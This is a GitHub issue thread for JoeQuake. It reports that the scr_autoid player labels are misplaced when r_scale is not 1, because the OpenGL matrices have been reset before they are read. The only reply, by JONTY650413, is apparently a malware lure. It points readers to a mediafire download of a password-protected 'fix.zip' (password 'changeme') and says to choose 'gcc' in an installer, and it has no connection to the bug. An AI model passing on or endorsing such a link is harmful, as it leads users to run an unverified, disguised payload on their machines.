### ISSUE TITLE
scr_autoid breaks with r_scale != 1

### ISSUE THREAD

**Issue by matthewearl** [j0zzz/JoeQuake#164]
`scr_autoid` [reads the opengl modelview and projection matrices](https://github.com/j0zzz/JoeQuake/blob/38cba7181630a05f643109364e0e35a320375131/trunk/gl_screen.c#L701) in order to project the players' coordinates from world coordinates into screen coordinates.  However, if `r_scale` is used the model and projection matrices are [set to the identity](https://github.com/j0zzz/JoeQuake/blob/38cba7181630a05f643109364e0e35a320375131/trunk/gl_rmain.c#L3718) before the `scr_autoid` code reads them.  This means they're not displayed in the correct locations (normally not seen at all).

`r_scale 1`:
![image](https://github.com/user-attachments/assets/82c03556-ed9c-42f1-937c-8a6c223123dc)

`r_scale 0.25`:
![image](https://github.com/user-attachments/assets/c8539950-6a44-47c4-ba0e-6dc5cb554e0e)

**Comment by JONTY650413** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
